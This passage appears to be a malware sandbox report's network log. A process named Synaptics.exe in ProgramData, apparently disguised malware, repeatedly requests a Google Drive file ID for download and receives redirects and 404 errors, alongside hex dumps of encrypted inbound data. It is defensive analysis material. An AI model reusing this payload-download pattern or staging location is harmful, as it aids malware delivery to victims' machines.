2024-12-30 10:36:39 UTC	1378	IN	Data Raw: 9b c2 17 0e 16 53 bc 4d 26 db 74 da f8 a4 93 f9 ce 99 be ba 42 ad e4 f2 d3 f2 a4 9e f5 0e 82 7e 01 0f fe e1 98 af fe 6c fa 27 c9 8c 58 e6 de d0 38 d7 31 0c e4 2c 17 97 60 15 57 0b fa 85 8e 25 a9 a3 99 59 9d 40 55 30 ae 4a 40 ad 44 9a d0 9d 95 c3 1d 8a b9 0f 7c f2 9f 8b 61 20 31 ac f0 95 e6 db bd c9 0a 4f 1e 32 e1 86 33 ae 1c f5 fe 9f 7f a6 3d ae f1 48 88 7e bc b6 54 ad 34 da 0a 59 86 fa 30 0e 30 d5 55 b2 32 da 1a a1 8a 34 0c 00 b9 69 df 1d 40 58 b9 45 1c 1e 11 c6 61 c8 ca ae 54 af d6 76 5b a3 0a 79 6f 22 9b ab 87 79 ca 03 14 db 73 32 4e 69 6e f1 93 86 a2 1d d4 45 ed 65 5c 16 f7 87 b8 be 4b b5 24 da d3 cc 23 65 81 74 b4 08 4b bd 0e e3 19 82 ac e7 d2 c0 19 c9 38 0e b9 1c e3 df 88 69 1d c6 86 5d 4e 86 fb 75 01 4a 81 37 f4 fa ab 62 81 25 34 c3 46 88 49 b3 a4 Data Ascii: SM&tB~l'X81,`W%Y@U0J@D\|a 1O23=H~T4Y00U24i@XEaTv[yo"ys2NinEe\K$#etK8i]NuJ7b%4FI
2024-12-30 10:36:39 UTC	1378	IN	Data Raw: 4e 9c 22 3a a6 ef b5 e8 93 ce ed 14 dc 43 d3 1e 23 d9 30 3c 33 e4 c3 51 26 89 9b 11 ec 52 d9 da 5d 08 7b 0d 78 4a 3b e4 22 b4 eb c8 7a f1 b1 28 6f 06 ff 8b da 47 0b da 0c c2 0c 3e 01 93 5e be 6c 0a 00 19 64 da 6c 12 f9 13 97 76 12 a4 e4 ec bf 2a 2b 93 08 f6 ee 90 ca 31 8f 3b ef a1 da c1 b5 6d 79 c3 91 d8 46 ff cf 5f 50 9d c3 84 5f 4d 2f d8 9f 71 9d 4f 69 29 b6 b8 b4 79 aa 38 41 b7 c1 69 64 9f 25 8b 6e 12 c4 62 30 a6 c1 80 88 72 73 b0 8b 50 cf f6 13 27 88 02 a9 cc 05 ab a6 29 26 85 da 58 25 d9 a2 91 64 0c 8f 7f 78 82 cd 43 53 fb e8 25 9e 48 bd 5c 27 45 06 be cf 8d a9 a2 1d 1c 02 c4 44 82 43 66 11 7b ad d7 cd b3 0e 7e e2 e5 68 ca 61 ce f5 c9 b2 72 90 1c b0 44 ea 29 f0 61 3a 80 82 b1 98 a8 b3 63 79 3c 4c 28 9e 36 68 5b 1b 45 bd db a9 ed a3 8e 38 26 2a 03 f2 Data Ascii: N":C#0<3Q&R]{xJ;"z(oG>^ldlv+1;myF_P_M/qOi)y8Aid%nb0rsP')&X%dxCS%H\'EDCf{~harD)a:cy<L(6h[E8&
2024-12-30 10:36:39 UTC	1378	IN	Data Raw: 32 03 0f b0 cd a7 09 69 9c a2 70 ce b5 b7 8c da 21 03 7f 4d fc d9 cf ea b3 f9 cc 3b 02 30 f3 1f 4c e7 d2 d9 ef 14 b0 67 24 b7 88 49 48 ce 01 ab 9f 0c 5b ea 58 f5 b9 50 a6 05 1f 0c 7f 87 92 70 36 04 6b e6 1c 59 2b d0 e9 5a e8 9b c0 32 b4 40 cf ec a1 65 f2 41 24 67 a3 bf 29 31 62 5b a2 25 4c 7a 1b 0a 15 61 84 a6 0f 25 98 94 c4 9b 18 19 c2 4b 4e 09 ff 81 66 05 d4 61 6c 1e ca 96 fd 8b 28 d7 ff 88 49 25 2c b0 8c 73 09 ae 19 de b3 14 2a 5c 00 cf eb 39 96 78 8b 65 8b b0 74 db 05 f6 72 56 f0 b7 b8 d6 18 19 40 ed 75 77 79 da 10 bb 39 db d2 17 db a5 74 51 f5 0d ca 79 97 9f f8 97 2c 83 6c 70 eb 05 ea 02 81 82 94 24 b4 0b b8 d4 23 8b b9 aa f5 36 ea f8 f7 33 63 a6 31 31 30 32 0b d5 cc 51 b3 dd a7 9b 1f d7 c1 2d 18 d4 da dd c7 8e 98 98 7e 08 8b 0c 43 c4 16 eb eb 59 a5 Data Ascii: 2ip!M;0Lg$IH[XPp6kY+Z2@eA$g)1b[%Lza%KNfal(I%,s*\9xetrV@uwy9tQy,lp$#63c1102Q-~CY
2024-12-30 10:36:39 UTC	1378	IN	Data Raw: fa 21 5a df e8 1a bb 67 01 5a 09 8c 0f d5 d8 c4 18 72 f3 6c 8b 5e 4f 18 47 c6 7c 13 53 ec a6 5f ec 2a b5 cb d8 a2 00 a5 ab 96 26 0b 05 20 3e b6 76 96 a6 96 70 0b c5 78 c9 e4 a4 fc e7 b2 a6 8e 64 ef 75 9c f0 36 e5 7f 2c e0 6f 0a 0c 20 53 3f 40 68 73 0f db 88 bb f1 66 a0 c7 0e 07 2c 8e 89 6e aa 4f b7 3e ef 89 e8 69 c4 56 7f 17 5c 72 4d 95 fd c8 2f 16 03 17 86 01 df 24 8e 24 3a 1a 0e 3e 17 1b ca db 3d db ed 19 b5 85 a1 bf 76 e0 93 ab 12 ea 5f 32 e6 54 3c 55 b4 91 63 60 53 25 8c 12 0b bc 7e 19 67 1b 52 d6 c6 24 3f 4b b9 2a f1 2e 5f 4b 31 d3 1d 77 2b 19 09 a9 bc 8b 1b 80 d0 f3 f2 26 f6 fb af d8 61 1d 79 04 30 c8 41 75 58 84 3e 14 eb c5 97 e4 f3 ef 3c a4 5d c7 6e c0 18 ac cb fd c5 4a c7 ef 5e 8b 41 e4 aa f4 bc 1f 10 8f d7 a3 c0 80 06 59 80 49 bf 06 7c 7c 98 53 Data Ascii: !ZgZrl^OG\|S_& >vpxdu6,o S?@hsf,nO>iV\rM/$$:>=v_2T<Uc`S%~gR$?K._K1w+&ay0AuX><]nJ^AYI\|\|S
2024-12-30 10:36:39 UTC	1378	IN	Data Raw: bf fc 89 20 2e 75 ac 81 95 a2 48 74 11 84 d3 e2 ef 39 a6 e8 51 d3 19 58 e3 e2 5f 89 ba f2 a3 1c 80 f1 94 0e 14 c7 26 48 68 56 f0 b9 0a 38 32 bc c4 b8 d5 72 01 db 10 64 ee be f7 ac 7b 26 7e e3 e0 8d b5 92 ee 7c f3 e0 31 30 70 00 ab 86 e1 49 d9 c0 5c 9b b2 8f e5 eb 99 9b f2 92 51 61 e1 0e d6 ed f3 5b 83 8e a3 fd b8 49 78 db 7b 91 b7 fb 03 82 5c 90 2b f0 08 b2 b1 9d de 23 91 0b cc 42 68 19 28 ae e0 90 1a 9f 14 87 2c 2f aa 2c ea af 4e 7e b4 0d db 1d 7d db b2 a4 91 45 49 6f 50 77 37 4a ab db 3c 14 9e ea f3 ea 2e d7 9b 5e fd 38 cb 3d b9 5a b2 8d 33 43 ea b5 c4 82 d2 9e 1f 0e 01 37 4d ee 43 7a 3d a1 16 bd 15 3f 21 9f c4 7e db d9 85 b2 70 45 67 4f fb c7 66 70 bf 72 06 c4 ce 82 10 43 64 a7 6b 52 bd 67 fb cb 57 e0 13 c9 30 ba a3 fe 53 c0 c6 b1 f6 98 e2 3c 2a 4b 56 Data Ascii: .uHt9QX_&HhV82rd{&~\|10pI\Qa[Ix{\+#Bh(,/,N~}EIoPw7J<.^8=Z3C7MCz=?!~pEgOfprCdkRgW0S<*KV
2024-12-30 10:36:39 UTC	1378	IN	Data Raw: 7d 4c a3 97 5e 50 cb 75 7c 03 5a 15 21 f0 63 22 0d f9 87 62 96 c1 24 b4 ec 3e 77 4c 4a 61 28 07 4b d8 27 e8 e8 e5 89 06 2f 7c ac d4 a4 00 ed 88 e4 15 d5 c1 63 c0 20 91 29 e9 e6 1e 01 5e 03 f7 33 8f 65 84 3e 39 5b ed 55 c5 b7 b8 25 18 04 ba b6 10 7b 09 29 4e c5 e1 e9 5b c5 4d 47 40 34 0c cb 6b f9 1a fe 98 c0 56 82 97 91 35 7a e6 6b bb 4f 4f 07 7e 8b 43 20 a1 40 0e d3 d7 5b 4f 32 b8 ca 13 4e 6d 91 74 4c d5 dd f8 dd c4 bd b9 75 5f 85 fc c5 5c 88 b8 fb 23 5b 0e 87 28 ad f7 4d 07 a2 e3 4c e0 94 5d 35 27 df d0 dc 9b f8 9b 76 e6 ca a8 2b 0a 61 81 63 95 49 00 e8 11 8a 14 60 d1 40 cc df 70 7e 7d ee 3b b8 45 cf 0e 6a 96 72 b6 2f 36 d0 bc 43 79 70 ed 9c 5d 3b aa d3 ba ff 8f db 15 0f f2 ba 10 9d ef 66 e1 9a 89 e8 ad 98 d1 6e 5e b0 3f 81 4e 35 2f 21 d5 20 62 f2 e6 dc Data Ascii: }L^Pu\|Z!c"b$>wLJa(K'/\|c )^3e>9[U%{)N[MG@4kV5zkOO~C @[O2NmtLu_\#[(ML]5'v+acI`@p~};Ejr/6Cyp];fn^?N5/! b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49992	216.58.206.46	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:20 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:37:20 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:20 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce--LdH_goVuDynMKty-MpNgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49991	216.58.206.46	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:20 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:37:20 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:20 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-4QzxMPH6vEUXKbOBRgwq9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49997	216.58.206.46	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:21 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:37:21 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:21 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-woF7w135KZoZp1EsCna92g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49996	216.58.206.46	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:21 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:37:21 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:21 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-Hn-VoXC5JoNQcm4dY-pX5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49999	142.250.185.193	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:21 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-30 10:37:21 UTC	1595	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5XWSrhnRB2W18K3eghV2N8q5_dWNDKs_XUbvubQ8fzfWZB0DkqCJVYIaCkvTY_mnPj Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:21 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'report-sample' 'nonce-dogPWXIPWvMAqTqFIal8Rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=bAtSZSfoXFBiluy46CB7k9cHRpfL4Bz73ZWRWPtP5k3G4Znb18NnXhXdYk8jopoJHGzMy0aIH0-Fg3dPaUleqXNTRyUFEREUv1J1hmPEi9rC8qfgpx5w8U5FK67fWNl8oakfOAzOBcIFTfBpN46uQQLYY_uY4fU8RdYmN11xJrpegf8ZaG8DoXya; expires=Tue, 01-Jul-2025 10:37:21 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:37:21 UTC	1595	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 69 44 53 75 63 78 43 41 6f 59 65 47 74 32 54 5a 39 63 58 42 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3iDSucxCAoYeGt2TZ9cXBA">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:37:21 UTC	57	IN	Data Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: d on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49998	142.250.185.193	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:21 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-30 10:37:21 UTC	1595	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4lSlIGMB8niklMKGasDIMw_Xw14ReYuoBp36gbJEt7EivP9SvMSW_Esj8xYeegJabq Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:21 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce--tsJwvpQJmOagwSnsCQE0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=LRPRXegY6m9OjZhuz5EvAkPBWAKKRsREt2dk1beNm1QtpheY8ZW1cwkgoG-dICLg2SQHO028TvOIW08hkNVSi0dSOfkAqe_c9o7g41S2SH2_t1T4lC2ZBSFBSDZ650nr5APjJP_BP6LbB1KBmeJHo2RF7MV0FJX5JLvSF_tnTd5YcjzXIxcThWRy; expires=Tue, 01-Jul-2025 10:37:21 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:37:21 UTC	1595	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 66 31 59 53 47 78 51 35 6b 72 42 75 37 68 58 63 77 63 63 4a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wf1YSGxQ5krBu7hXcwccJg">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:37:21 UTC	57	IN	Data Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: d on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	50003	216.58.206.46	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:22 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:37:22 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:22 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-Y6pnt2YDGmIbB7RzdOJarg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	50002	216.58.206.46	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:22 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:37:22 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:37:22 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-luTeM4kibOJn7tHTLiCuDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	50004	142.250.185.193	443	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:37:22 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
